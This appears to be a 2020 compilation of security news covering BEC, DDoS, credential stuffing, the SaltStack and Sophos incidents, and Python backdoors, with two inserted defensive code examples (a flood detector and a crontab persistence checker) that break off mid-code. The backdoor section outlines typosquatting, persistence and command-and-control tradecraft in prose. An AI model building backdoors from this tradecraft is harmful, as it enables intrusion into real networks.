The survey of 500 IT professionals found that when it comes to cybersecurity, employee data breaches are seen as the biggest risk to an organization. Two fifths (40 percent) of respondents named employee data breaches as the biggest overall threat to information security in the coming year, while a fifth (21 percent) said external attacks from cybercriminals are the biggest risk to information security, and 20 per cent believe it is ransomware/malware attacks.

When looking at what causes employee data breaches, more than half (51 percent) of IT professionals say these most commonly occur through external email services such as Gmail and Outlook. However, 42 percent say employee data breaches have happened through collaboration tools such as Slack and Dropbox, and 41 percent through SMS/messaging services. Just 6 percent of those surveyed said they had never knowingly experienced a data breach.

Despite data breaches being front of mind for IT teams, 95 percent of IT professionals say it’s a challenge to get visibility across their organizations’ data estate, and only 39 percent of organizations are taking active steps to gain visibility of their data.

“In simply performing their jobs, employees can unintentionally be the source of a data breach – by leaving high-risk information unprotected in the wrong place. It’s the responsibility of the company to provide the right methodology, technology, and processes that enable the workforce to continue to operate without burdening teams with undue process,” said Danny Reeves, CEO, Exonar.

“These days, every company is a data company, and large organizations often have thousands of systems and storage facilities. Unless companies are actively taking steps to know and understand their data, they’re leaving themselves vulnerable.”

6,600 organizations bombarded with 100,000+ BEC attacks

Cybercriminals are increasingly registering accounts with legitimate services, such as Gmail and AOL, to use them in impersonation and BEC attacks, according to Barracuda Networks.

BEC attacks impact thousands of organizations

In their most recent threat spotlight report, Barracuda researchers observed that 6,170 malicious accounts that have used Gmail, AOL and other email services have been responsible for over 100,000 BEC attacks, which have impacted nearly 6,600 organizations. What’s more, since April 1, these ‘malicious accounts’ have been behind 45% of all BEC attacks detected.

Essentially, cybercriminals are using malicious accounts to impersonate an employee or trusted partner, and send highly personalized messages for the purpose of tricking other employees into leaking sensitive information, or sending over money.

Cybercriminals prefer Gmail

The preferred choice of email service for malicious accounts is Gmail, which accounts for 59% of all email domains used by cybercriminals. Yahoo! is the second most popular, accounting for just 6% of all observed malicious account attacks.

Researchers also observed that 29% of malicious accounts are used for less than 24-hour periods – most likely to avoid detection and suspensions from email providers. However, it’s not unusual for cybercriminals to return and re-use an email address for an attack after a long break.

E-mail attacks

Having analyzed attacks on 6,600 organizations, Barracuda researchers found that in many cases, cybercriminals used the same email addresses to attack different organizations. The number of organizations attacked by each malicious account ranged from one, to a single mass scale attack that impacted 256 organizations — 4% of all the organizations included in the research.

Similarly, the number of email attacks sent by a malicious account ranged from one to over 600 emails, with the average being only 19.

“The fact that email services such as Gmail are free to set up, just about anyone can create a potentially malicious account for the purpose of a BEC attack. Securing oneself against this threat requires organizations to take protection matters into their own hands – this requires them to invest in sophisticated email security that leverages artificial intelligence to identify unusual senders and requests,” said Michael Flouton, VP Email Protection, Barracuda Networks.

“However, no security software will ever be 100% effective, particularly when the sender appears to be using a perfectly legitimate email domain. Thus, employee training and education is essential, and workers should be made aware of how to manually spot, flag and block any potentially malicious content.”

DDoS attacks in April, May and June 2020 double compared to Q2 2019

Findings from Link11’s H1 2020 DDoS Report reveal a resurgence in DDoS attacks during the global COVID-19 related lockdowns.

In April, May and June 2020, the number of attacks registered by Link11’s Security Operations Center (LSOC) averaged 97% higher than during the same period in 2019, peaking at a 108% increase in May 2020.

Key findings from the annual report include:

  • Multivector attacks on the rise: 52% of attacks combined several methods of attack, making them harder to defend against. One attack included 14 methods; the highest number of vectors registered to date.
  • Growing number of reflection amplification vectors: Most commonly used vectors included DNS, CLDAP and NTP, while WS Discovery and Apple Remote Control are still frequently used after being discovered in 2019. Since the beginning of the year, the vector set for DDoS attackers has also been expanded by DVR DHCPDiscovery. The LSOC discovered the vector that exploits a vulnerability in digital video recorders. The new method of attack was used hundreds of times for DDoS attacks during the COVID-19 pandemic in the second quarter of 2020.
  • DDoS sources for reflection amplification attacks distributed around the globe: The top three most important source countries in H1 2020 were USA, China, and Russia. However, more and more attacks have been traced back to France.
  • Average attack bandwidth remains high: The attack volume of DDoS attacks has stabilized at a high level, at an average of 4.1 Gbps. The majority of attacks (80%) were up to 5 Gbps. The largest DDoS attack was stopped at 406 Gbps. In almost 500 attacks, the attack volume was over 50 Gbps. This is well over the available connection bandwidth of most companies.
  • DDoS attacks from the cloud: At 47%, the percentage of DDoS attacks from the cloud was higher than the full year 2019 (45%). Instances from all established providers were misused, but most commonly were Microsoft Azure, AWS, and Google Cloud. Attackers often use false identities and stolen credit cards to open cloud accounts, making it difficult to trace the criminals behind attacks.
  • The longest DDoS attack lasted 1,390 minutes – 23 hours. Interval attacks, which are set like little pinpricks and thrive on repetition, lasted an average of 13 minutes.

The data showed that the frequency of DDoS attacks depends on the day of the week and time of the day, with most attacks concentrated around weekends and evenings. More attacks were registered on Saturdays, and out of office hours on weekdays.

“The pandemic has forced organizations to accelerate their digital transformation plans, but has also increased the attack surface for hackers and criminals – and they are looking to take full advantage of this opportunity by taking critical systems offline to cause maximum disruption. This ‘new normal’ will continue to represent a major security risk for many companies, and there is still a lot of work to do to secure networks and systems against the volume attacks. Organizations need to invest in security solutions based on automation, AI and Machine Learning that are designed to tackle multi-vector attacks and networked security mechanisms,” said Marc Wilczek, COO, Link11.

Cybercriminals are developing and boosting their attacks

An INTERPOL assessment of the impact of COVID-19 on cybercrime has shown a significant target shift from individuals and small businesses to major corporations, governments and critical infrastructure.

With organizations and businesses rapidly deploying remote systems and networks to support staff working from home, criminals are also taking advantage of increased security vulnerabilities to steal data, generate profits and cause disruption.

In one four-month period (January to April) some 907,000 spam messages, 737 incidents related to malware and 48,000 malicious URLs – all related to COVID-19 – were detected by one of INTERPOL’s private sector partners.

“Cybercriminals are developing and boosting their attacks at an alarming pace, exploiting the fear and uncertainty caused by the unstable social and economic situation created by COVID-19,” said Jürgen Stock, INTERPOL Secretary General.

“The increased online dependency for people around the world is also creating new opportunities, with many businesses and individuals not ensuring their cyber defences are up to date. The report’s findings again underline the need for closer public-private sector cooperation if we are to effectively tackle the threat COVID-19 also poses to our cyber health,” concluded the INTERPOL Chief.

Online scams and phishing

Threat actors have revised their usual online scams and phishing schemes. By deploying COVID-19 themed phishing emails, often impersonating government and health authorities, cybercriminals entice victims into providing their personal data and downloading malicious content. Around two-thirds of member countries which responded to the global cybercrime survey reported a significant use of COVID-19 themes for phishing and online fraud since the outbreak.

Disruptive malware

Cybercriminals are increasingly using disruptive malware against critical infrastructure and healthcare institutions, due to the potential for high impact and financial benefit. In the first two weeks of April 2020, there was a spike in ransomware attacks by multiple threat groups which had been relatively dormant for the past few months. Law enforcement investigations show the majority of attackers estimated quite accurately the maximum amount of ransom they could demand from targeted organizations.

Data harvesting malware

The deployment of data harvesting malware such as Remote Access Trojans, info stealers, spyware and banking Trojans by cybercriminals is on the rise. Using COVID-19 related information as a lure, threat actors infiltrate systems to compromise networks, steal data, divert money and build botnets.

Malicious domains

Taking advantage of the increased demand for medical supplies and information on COVID-19, there has been a significant increase of cybercriminals registering domain names containing keywords, such as “coronavirus” or “COVID”.

These fraudulent websites underpin a wide variety of malicious activities including C2 servers, malware deployment and phishing. From February to March 2020, a 569 per cent growth in malicious registrations, including malware and phishing and a 788 per cent growth in high-risk registrations were detected and reported to INTERPOL by a private sector partner.

Misinformation

An increasing amount of misinformation and fake news is spreading rapidly among the public. Unverified information, inadequately understood threats, and conspiracy theories have contributed to anxiety in communities and in some cases facilitated the execution of cyberattacks. Nearly 30 per cent of countries which responded to the global cybercrime survey confirmed the circulation of false information related to COVID-19. Within a one-month period, one country reported 290 postings with the majority containing concealed malware.

There are also reports of misinformation being linked to the illegal trade of fraudulent medical commodities. Other cases of misinformation involved scams via mobile text-messages containing ‘too good to be true’ offers such as free food, special benefits, or large discounts in supermarkets.

Future projections

A further increase in cybercrime is highly likely in the near future. Vulnerabilities related to working from home and the potential for increased financial benefit will see cybercriminals continue to ramp up their activities and develop more advanced and sophisticated modi operandi.

Threat actors are likely to continue proliferating coronavirus-themed online scams and phishing campaigns to leverage public concern about the pandemic. Business Email Compromise schemes will also likely surge due to the economic downturn and shift in the business landscape, generating new opportunities for criminal activities.

When a COVID-19 vaccination is available, it is highly probable that there will be another spike in phishing related to these medical products as well as network intrusion and cyberattacks to steal data.

Analysis of 92 billion rejected emails uncovers threat actors’ motivations

Mimecast released the Threat Intelligence Report: Black Hat U.S.A. Edition 2020, which presents insights gleaned from the analysis of 195 billion emails processed by Mimecast for its customers from January through June 2020. Of those, 92 billion (47%) were flagged as malicious or spam and rejected.

Blocked impersonation attacks

Main trends

Two main trends ran throughout the analysis: attackers’ desire for monetary gain and a continued reliance on COVID-19-related campaigns, especially within certain vertical industries.

One of the most significant observations was that threat actors are launching opportunistic and malware-based campaigns across multiple verticals at alarming volumes. The report also forecasts what types of attacks will likely spike in the next six months.

Attacks and malware-centric campaigns

The majority of attacks seen by Mimecast during this period were simple, high volume forms of attack, such as spam and phishing, which is likely a reflection of the ease of access to tools and kits available online. As the attacks progressed, exploits evolved to more potent forms of malware and ransomware, with the attacker’s goal appearing to be monetary gain.

In addition, malware-centric campaigns have been a fixture of 2020 and have become increasingly sophisticated. 42 significant campaigns were identified during the six-month period that the report covers. The campaigns showed a significant uptick in the use of short-lived, high volume, targeted and hybridized attacks against many sectors of the U.S. economy.

Researchers believe this is highly likely a consequence of threat actors targeting industries that remained open during the ‘stay at home’ period in the U.S., as well as those essential to the nation’s recovery from the current pandemic. Interestingly, the media and publishing sectors suffered high volumes of impersonation attacks, potentially as a vehicle for cybercriminals to spread disinformation across the U.S.

“If one thing is for certain, the pandemic we’re living in today has caused significant challenges. We’ve continued to see threat actors tap into the vulnerabilities of humans and launch campaign after campaign with a COVID-19 hook, in attempt to get users to click harmful links or open malicious files,” said Josh Douglas, VP of product management, threat intelligence at Mimecast.

Mimecast signature detections

Understanding the modern threat landscape

Threat actors go where the money flows. The attacks from January-June 2020 incorporated a vast array of threats, including Azorult, Barys, Cryxos, Emotet, Hawkeye, Lokibot, Nanocore, Nemucod, Netwired, Remcos, Strictor, and ZLoader, and involved a combination of mass generic Trojan delivery with phishing campaigns with the goal of monetary gain.

Industries that remained open during the pandemic were the hardest hit. The top sectors for attacks in the U.S. were: manufacturing, retail/wholesale, finance and insurance. In addition, the media and publishing sector suffered high volumes of impersonation attacks (48.4 million detections), potentially as a vehicle to spread disinformation across the U.S.

Organizations are at a higher risk of being attacked by ransomware. Researchers found that it is highly likely that U.S. businesses are at risk of ransomware attacks, due to threat actors’ efforts towards the high volume, opportunistic attack of multiple verticals. The circumstances of the pandemic make organizations more vulnerable to ransomware, so it will likely remain a significant threat for the second half of 2020.

Impersonation attacks continue to accelerate. The volume of sender impersonation attacks increased by 24% between January and June to nearly 46 million per month.

20% of credential stuffing attacks target media companies

The media industry suffered 17 billion credential stuffing attacks between January 2018 and December 2019, according to a report from Akamai.

The apparent fourfold increase in attacks is partly attributable to the enhanced visibility into the threat landscape

The report found that 20% of the 88 billion total credential stuffing attacks observed during the reporting period targeted media companies.

Media companies present an attractive target

Media companies present an attractive target for criminals according to the report, which reveals a 63% year-over-year increase in attacks against the video media sector.

The report also shows 630% and 208% year-over-year increases in attacks against broadcast TV and video sites, respectively. At the same time, attacks targeting video services are up 98%, while those against video platforms dropped by 5%.

The marked uptick in attacks aimed at broadcast TV and video sites appears to coincide with an explosion of on-demand media content in 2019. In addition, two major video services launched last year with heavy support from consumer promotions. These types of sites and services are well aligned to the observed goals of the criminals who target them.

Much of the value in media industry accounts lies in the potential access to both compromised assets, like premium content, and personal data, according to Steve Ragan, author of the report.

“We’ve observed a trend in which criminals are combining credentials from a media account with access to stolen rewards points from local restaurants and marketing the nefarious offering as ‘date night’ packages. Once the criminals get a hold of the geographic location information in the compromised accounts, they can match them up to be sold as dinner and a movie,” Ragan explained in the report.

Attacks targeting published content

Video sites are not the sole focus of credential stuffing attacks within the media industry, however. The report notes a 7,000% increase in attacks targeting published content.

Newspapers, books and magazines sit squarely within the sights of cybercriminals, indicating that media of all types appear to be fair game when it comes to these types of attacks.

The United States was by far the top source of credential stuffing attacks against media companies with 1.1 billion in 2019, an increase of 162% over 2018. France and Russia were a distant second and third with 3.9 million and 2.4 million attacks, respectively.

India was the most targeted country in 2019, enduring 2.4 billion credential stuffing attacks. It was followed by the United States at 1.4 billion and the United Kingdom at 124 million.

“As long as we have usernames and passwords, we’re going to have criminals trying to compromise them and exploit valuable information,” Ragan explained.

“Password sharing and recycling are easily the two largest contributing factors in credential stuffing attacks. While educating consumers on good credential hygiene is critical to combating these attacks, it’s up to businesses to deploy stronger authentication methods and identify the right mix of technology, policies and expertise that can help protect customers without adversely impacting the user experience.”

Some of the shuffling of top target areas in Q1 2020 correlate with effects of the pandemic lockdowns in various parts of the world

Spike in malicious login attempts against European broadcasters

There was a large spike in malicious login attempts against European video service providers and broadcasters during the first quarter of 2020. One attack in late March, after many isolation protocols had been instituted, directed nearly 350,000,000 attempts against a single service provider over a 24-hour period.

Separately, one broadcaster well known across the region was hit with a barrage of attacks over the course of the quarter, with peaks that ranged in the billions.

Another noteworthy trend during the first quarter was the number of criminals sharing free access to newspaper accounts. Often offered as self-promotional vehicles, credential stuffing campaigns must still be initiated in order to steal the working username and password combinations that are given away.

Researchers also observed a decline in the cost of stolen account credentials over the course of the quarter, which traded for approximately $1 to $5 at the start and $10 to $45 for package offers of multiple services. Those prices fell as new accounts and lists of recycled credentials populated the market.

Hackers breached six Cisco servers through SaltStack Salt vulnerabilities

Earlier this month, when F-Secure publicly revealed the existence of two vulnerabilities affecting SaltStack Salt and attackers started actively exploiting them, Cisco was among the victims.

The revelation was made on Thursday, when Cisco published an advisory saying that, on May 7, 2020, they discovered the compromise of six of their salt-master servers, which are part of the Cisco VIRL-PE (Virtual Internet Routing Lab Personal Edition) service infrastructure.

About SaltStack Salt, the vulnerabilities, and the problem with patching

SaltStack Salt is open source software that is used for managing and monitoring servers in datacenters and cloud environments. It is installed on a “master” server and it manages “minion” servers via an API agent.

The two recently revealed vulnerabilities – CVE-2020-11651 (an authentication bypass flaw) and CVE-2020-11652 (a directory traversal flaw) – can be exploited by unauthenticated, remote attackers to achieve RCE as root on both masters and minions.

The flaws were fixed in late April, but not all exposed Salt servers have been patched. A few weeks ago, Censys put the number of potentially vulnerable, internet-exposed Salt servers at 2,928.

One of the things that likely prolonged the deployment of patches is the fact that Salt is integrated in other solutions, and developers of those solutions took some time to push out security updates.

VMware vRealize Operations Manager is one of those solutions, and so are two network architecture modeling and testing solutions by Cisco.

Cisco’s breach

“Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE) incorporate a version of SaltStack that is running the salt-master service that is affected by these vulnerabilities,” Cisco shared.

“Cisco infrastructure maintains the salt-master servers that are used with Cisco VIRL-PE. Those servers were upgraded on May 7, 2020. Cisco identified that the Cisco maintained salt-master servers that are servicing Cisco VIRL-PE releases 1.2 and 1.3 were compromised.”

The company remediated the affected servers the same day and has provided software updates that address these vulnerabilities, so that enterprise admins who installed these solutions on-premises can fix them.

For more information about which software releases are affected and under what conditions, admins should peruse the advisory, which also offers some workarounds.

Cisco did not say what the attackers’ ultimate goal was, but in previously disclosed attacks, their intent was to install cryptocoin miners.

Attackers exploiting a zero-day in Sophos firewalls, have yours been hit?

Sophos has released an emergency hotfix for an actively exploited zero-day SQL injection vulnerability in its XG Firewalls, and has rolled it out to all units with the auto-update option enabled.

Aside from plugging the security hole, the hotfix detects if the firewall was hit by attackers and, if it was, stops it from accessing any attacker infrastructure, cleans up remnants from the attack, and notifies administrators about it so that they can perform additional remediation steps.

About the vulnerability and the attack

The flaw, which has yet to be assigned a CVE identification number, was previously unknown to Sophos and turned out to be a pre-auth SQL injection vulnerability that was exploited for remote code execution.

The zero-day affects all versions of XG Firewall firmware on both physical and virtual Sophos firewalls.

“Sophos received a report on April 22, 2020, at 20:29 UTC regarding an XG Firewall with a suspicious field value visible in the management interface. Sophos commenced an investigation and the incident was determined to be an attack against physical and virtual XG Firewall units,” the company shared.

“The attack affected systems configured with either the administration interface (HTTPS admin service) or the user portal exposed on the WAN zone. In addition, firewalls manually configured to expose a firewall service (e.g. SSL VPN) to the WAN zone that shares the same port as the admin or User Portal were also affected.”

The company says that the attack used a chain of Linux shell scripts that eventually downloaded ELF binary executable malware compiled for SFOS, the Sophos Firewall Operating System (i.e., the firmware).

The goal of the attack was to deliver malware that is able to collect information such as:

  • The firewall’s public IP address
  • Its license key
  • The email addresses of user accounts that were stored on the device as well as that of the administrator account
  • Firewall users’ names, usernames, the encrypted form of the passwords, and the salted SHA256 hash of the administrator account’s password
  • A list of the user IDs permitted to use the firewall for SSL VPN and accounts that were permitted to use a “clientless” VPN connection
  • Additional information about the firewall (e.g., firmware version, CPU type, etc.)
  • A list of the IP address allocation permissions for the users of the firewall

All this information was written in a file, which was compressed, encrypted, and uploaded to a remote machine controlled by the attacker(s).

Remediation

Those admins who have disabled the (default) auto-update option are advised to implement the hotfix manually.

The admins whose firewalls have been compromised should reset device administrator accounts, reboot the affected device(s), reset passwords for all local user accounts and for any accounts where the XG credentials might have been reused.

Sophos also advises admins to reduce attack surface by disabling HTTPS Admin Services and User Portal access on the WAN interface (if possible).

“While customers should always conduct their own internal investigation, at this point Sophos is not aware of any subsequent remote access attempts to impacted XG devices using the stolen credentials,” the company added.

Distributed disruption: Coronavirus multiplies the risk of severe cyberattacks

The coronavirus pandemic is upending everything we know. As the tally of infected people grows by the hour, global healthcare, economic, political, and social systems are bending and breaking under the strain, and for much of the world there’s no end in sight. But amid this massive wave of disruption, one thing hasn’t changed: the eagerness of cybercriminals to capitalize on society’s misfortune and uncertainty to sabotage, cripple, mislead and steal.

New states of emergency are being declared every day as the virus keeps spreading. Confirmed cases have meanwhile been reported in more than 150 countries on six different continents. Nations and organizations everywhere are working around the clock to flatten the COVID-19 curve by imposing remote work policies, travel bans, and self-isolation.

In an unprecedented time like this, the reliance on the Internet is growing exponentially, turning the data highway into an even more indispensable channel for communication, information sharing, commerce, and everyday social interaction.

The Internet lifeline

To prevent their phone lines from being overwhelmed with information requests, governments around the globe are making digital the default communication stream and directing citizens to the official websites of their health ministries or public health agencies for COVID-19 updates. People are hitting Facebook and other social media like never before to keep up with and share the latest news. Telecom giant Vodafone has reported a 50% surge in European internet use, and Netflix has been requested to cut its bitrate in Europe for 30 days in order to prevent the Internet from collapsing.

In this context, a cyberattack that denies organizations or families access to their devices or data could be catastrophic. In a worst-case scenario, one or more cyberattacks could cause broad-based infrastructure shutdowns that take whole communities or cities offline and further hinder already overburdened healthcare providers, transportation systems and networks.

Germany, Italy and Spain are among the many countries and jurisdictions (like New York and California) that have implemented draconian measures to limit the spread of the COVID-19 virus. Non-essential businesses have been made to close, and people to stay at home. Consequently, citizens are relying heavily on delivery services, which continue to operate. However, in Germany, cybercriminals recently unleashed a DDoS attack on one of the largest home delivery platforms, which affected customers and owners of more than 15,000 restaurants across the country. The criminals asked for two bitcoins (worth roughly $11,000) to stop the siege.

A few days earlier, the U.S. Department of Health and Human Services (HHS) suffered a DDoS attack, assumed to have been launched by a hostile foreign actor, aimed at slowing down the agency’s services amid the government’s rollout of a response to coronavirus. The incident allegedly tried to overload HHS servers with millions of hits in just hours. The attack in the US occurred just two weeks after Australia’s federal cyber agency warned that Australian banks were in the crosshairs of extensive DDoS extortion campaigns.

Especially digitally-advanced industries with a heavy dependence on internet connectivity are more vulnerable than ever. Europol’s “Internet Organised Crime Threat Assessment 2019” report notes that – besides the public sector and financial institutions – travel agents, Internet infrastructure, e-commerce, and online gaming services were lucrative targets for DDoS extortionists.

The perils of DDoS attacks on VPN servers

When it comes to remote work, VPN servers turn into bottlenecks. Keeping them secure and available is a number-one IT priority. Hackers can launch DDoS campaigns on VPN services and deplete their resources, knocking out the VPN server and limiting its availability. The implications are clear: Since the VPN server is the gateway to a company’s internal network, an outage can keep all employees working remotely from doing their job, effectively cutting off the entire organization from the outside world.

During an unprecedented time of peak traffic, the risk of a DDoS attack is growing exponentially. If the utilization of the available bandwidth is very high, it does not take much to cause an outage. In fact, even a tiny attack can become the last nail in the coffin. For instance, a VPN server or firewall can be taken down by a TCP blend attack with an attack volume as low as 1 Mbps. SSL-based VPNs are just as vulnerable to an SSL flood attack, as are web servers.

Making matters worse, many organizations either use in-house hardware appliances or rely on their Internet carrier to ward off incoming attacks. These deployment models tend to run with low levels of automation, requiring human intervention of some sort to operate. If someone or something throws a digital wrench into the system, fixing the problem remotely will be an uphill battle if there are few or no IT staff on-site. Since these deployment models typically require 10 or even 20 minutes before they even detect an incident, any attack will almost inevitably cause a major outage.

APIs and web apps broaden the attack surface

The Application Programming Interface (API) is a key part of every cloud service or web app. APIs enable service integration and interoperability – for instance, by letting an app process a payment through PayPal or a client’s credit account to complete a transaction. But they can also turn into a single point of failure that exposes companies to a wide variety of risks and vulnerabilities. When a business-critical application or API is compromised, every operation that depends on it goes down with it, setting off a potentially devastating chain reaction.

Guarding against or managing application layer attacks – such as an HTTP/HTTPS flood – is especially difficult, as the malicious traffic is hard to distinguish from regular traffic. Layer-7 attacks are in that sense highly effective, as they require little bandwidth to create a blackout.
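The point above, that an HTTP flood carries no payload signature and has to be picked out by behaviour, as an added example that is not part of the original article: a small Python detector that profiles each client in a batch of access-log lines by request rate, concentration on a single path and User-Agent diversity, and flags a client only when several of these indicators coincide. The log lines, client addresses, paths and thresholds are all constructed for the example; the flooding client deliberately sends an ordinary browser User-Agent, so nothing in any single request gives it away.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone

# Combined Log Format: ip ident user [time] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    """One access-log line -> dict, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["path"].split("?", 1)[0]   # ignore query strings: /search?q=1 == /search?q=2
    return rec

def profile_clients(lines):
    """Per-source-IP counters: request count, path histogram, User-Agent set, first/last timestamp."""
    stats = defaultdict(lambda: {"n": 0, "paths": Counter(), "uas": set(), "first": None, "last": None})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        s = stats[rec["ip"]]
        s["n"] += 1
        s["paths"][rec["path"]] += 1
        s["uas"].add(rec["ua"])
        s["first"] = rec["ts"] if s["first"] is None else min(s["first"], rec["ts"])
        s["last"] = rec["ts"] if s["last"] is None else max(s["last"], rec["ts"])
    return stats

def flood_suspects(lines, max_rps=5.0, path_share=0.9, min_requests=20):
    """Clients with at least two flood indicators: high rate, one path dominating, a single User-Agent."""
    suspects = {}
    for ip, s in profile_clients(lines).items():
        if s["n"] < min_requests:                        # too little traffic to judge
            continue
        span = max((s["last"] - s["first"]).total_seconds(), 1.0)
        rps = s["n"] / span
        top_path, top_n = s["paths"].most_common(1)[0]
        share = top_n / s["n"]
        reasons = []
        if rps > max_rps:
            reasons.append(f"{rps:.1f} requests/s")
        if share >= path_share:
            reasons.append(f"{share:.0%} of requests hit {top_path}")
        if len(s["uas"]) == 1:
            reasons.append("single User-Agent for every request")
        if len(reasons) >= 2:
            suspects[ip] = reasons
    return suspects

# --- Constructed sample traffic (synthetic addresses, paths and agents; not a real capture) ---
_T0 = datetime(2020, 3, 23, 10, 0, 0, tzinfo=timezone.utc)
_UAS = ["Mozilla/5.0 (Windows NT 10.0)", "Mozilla/5.0 (Macintosh)", "Mozilla/5.0 (X11; Linux)"]
_PATHS = ["/", "/login", "/static/app.js", "/account", "/logout"]

def _line(ip, seconds, path, ua, status=200):
    ts = (_T0 + timedelta(seconds=seconds)).strftime("%d/%b/%Y:%H:%M:%S %z")
    return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" {status} 512 "-" "{ua}"'

SAMPLE_LOG = []
for i, ip in enumerate(["203.0.113.7", "203.0.113.8", "203.0.113.9"]):   # casual browsing
    for k in range(8):
        SAMPLE_LOG.append(_line(ip, k * 7 + i, _PATHS[k % 5], _UAS[i]))
for k in range(25):                                                     # a busy but legitimate user
    SAMPLE_LOG.append(_line("203.0.113.10", k * 2, _PATHS[k % 5], _UAS[1]))
for k in range(120):                                                    # the flood: 120 searches in 10 s
    SAMPLE_LOG.append(_line("198.51.100.23", k // 12, f"/search?q={k}", _UAS[0]))

if __name__ == "__main__":
    for ip, reasons in flood_suspects(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```

On real logs you would compute these statistics over a sliding window rather than one batch, tune the thresholds per endpoint (a search endpoint legitimately attracts far more repeat requests than a login form), and feed the verdict into rate limiting before a hard block, because many users behind one NAT address can look like a flood.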

Cybercrime exploits anxiety

Cybercriminals take advantage of human foibles to get past systemic defenses. In a crisis, especially a prolonged one, IT staff are more likely to make mistakes they would not have made otherwise. Attackers might lock system administrators out of their own servers while they roam the company network, steal proprietary data or deploy ransomware. Any downtime can alienate customers, erode trust and cause negative publicity, even anxiety.

Organizations should remain vigilant and prepare for attacks in advance, as this sort of incident is very difficult to respond to once it is unfolding. Companies should also continue to opt for cloud services for their scalability and for the extra bandwidth that maintains redundancy. Most importantly, during times of remote work and self-isolation, radical security automation is more important than ever to ensure an instant response and take human error out of the equation.

Hackers try to breach WHO, other COVID-19-fighting orgs

“Elite” hackers have tried – and failed – to breach computer systems and networks of the World Health Organization (WHO) earlier this month, Reuters reported on Monday.

In fact, since the start of the COVID-19 pandemic, the WHO has been fielding an increasing number of cyberattacks, as well as impersonation attempts.

About the attack

The attackers created a malicious site mimicking the WHO’s internal email system in an attempt to phish the agency staffers’ email credentials.

What the attackers were after and who they were is not known, although some sources suspect them to be the Darkhotel espionage crew, which has been active for over a decade and whose targets are usually high-profile individuals: executives in various sectors, including defense and energy, and government employees. (The sources did not say why they are inclined to point the finger at the Darkhotel threat actors.)

Costin Raiu, head of global research and analysis at Kaspersky, said that the malicious web infrastructure used in this attack had also been used to target other healthcare and humanitarian organizations in recent weeks.

Coronavirus researchers are being targeted

The Canadian Centre for Cyber Security has also been warning Canadian health organizations about cyber criminals and spies.

“[Sophisticated threat actors] may attempt to gain intelligence on COVID-19 response efforts and potential political responses to the crisis or to steal ongoing key research towards a vaccine or other medical remedies, or other topics of interest to the threat actor,” the federal agency noted.

“Cyber criminals may take advantage of the COVID-19 pandemic, using the increased pressure being placed on Canadian health organizations to extract ransom payments or mask other compromises.”

The agency advised healthcare organizations to be on the lookout for social engineering and spear-phishing attempts, and warned that attackers could exploit critical vulnerabilities and/or compromised credentials.

They also urged all organizations to “become familiar with and practice their business continuity plans, including restoring files from back-ups and moving key business elements to a back-up infrastructure,” and have provided a list of critical vulnerabilities that should be patched and/or mitigated as soon as possible.

Healthcare organizations previously hit

Cybercriminals wielding ransomware have already hit some healthcare organizations involved in the fight against the COVID-19 virus.

The Brno University Hospital, in Brno, Czech Republic, is one of them. London-based Hammersmith Medicines Research is another.

While the latter managed to repel the attack and did not suffer downtime, the attackers published some of the medical data they stole. They later removed the leaked files.

Python backdoor attacks and how to prevent them

Python backdoor attacks are increasingly common. Iran, for example, used the MechaFlounder Python backdoor against Turkey last year. Scripting attacks are nearly as common as malware-based attacks in the United States and, according to the most recent CrowdStrike Global Threat Report, scripting is the most common attack vector in the EMEA region.

Python’s growing popularity among attackers shouldn’t come as a surprise. Python is a simple but powerful programming language. With very little effort, an attacker can write a script of under 100 lines that establishes persistence (so that the script restarts itself even if you kill the process), opens a backdoor, obfuscates its communications both inside the network and with external servers, and sets up command and control. And an attacker who doesn’t want to write the code doesn’t have to: Python backdoor scripts are easy to find, and a simple GitHub search turns up more than 200.

Scripting attacks are favored by cybercriminals and nation states because they are hard for endpoint detection and response (EDR) systems to detect. Python is heavily used by admins, so the traffic of a malicious Python script closely resembles that produced by day-to-day network management tools.

It’s also fairly easy to get these malicious scripts onto targeted networks. Publish a package whose name differs from a commonly used library by a single character and carries a malicious script (typosquatting), and someone will almost certainly install it by mistake or pull it in as a dependency of another library. That is particularly insidious given how long the dependency list of many libraries can be.

By adding a bit of social engineering, attackers can successfully compromise specific targets. If an attacker knows the StackOverflow usernames of some of the admins at their targeted organization, he or she can respond to a question with ready-to-copy Python code that looks completely benign. This works because many of us have been “trained” by software companies to copy and paste code to deploy their software. Everyone knows it isn’t safe, but admins are often pressed for time and do it anyway.

Anatomy of a Python backdoor attack

Now, let’s imagine a Python backdoor has established itself on your network. How will the attack play out?

First, it will probably try to establish persistence. There are many ways to do this, but one of the easiest is a crontab entry that relaunches the script whenever it is not running, so that killing the process does not get rid of it. To stop it permanently, you need to remove the crontab entry first and then kill the process; in the other order, cron simply starts it again. Next it will connect to an external server to establish command and control, obfuscating its communications so they look normal, which is relatively easy because its traffic already resembles that of ordinary day-to-day operations.

At this point, the script can do pretty much anything an admin can do. Scripting attacks are often used as the point of the spear for multi-layered attacks, in which the script downloads malware and installs it throughout the environment.
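The persistence step described above, as an added example that is not from the original article: a Python triage helper that parses a crontab listing, flags entries that look like script persistence (an interpreter launched from a user-writable or hidden path, inline code passed with -c, a pgrep-or-relaunch watchdog, every-minute or at-boot schedules) and lists the entries that would relaunch a given script so they can be removed before the process is killed. The crontab text, paths and schedules are constructed for the example; the base64 string decodes to the harmless text `import os`.

```python
import re
import shlex

# Constructed crontab listing, as `crontab -l` would print it (not from a real host).
# The base64 string in the last entry decodes to the harmless text "import os".
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 2 * * * /usr/local/bin/backup.sh >/var/log/backup.log 2>&1
*/5 * * * * /usr/bin/python3 /opt/monitoring/collect_metrics.py
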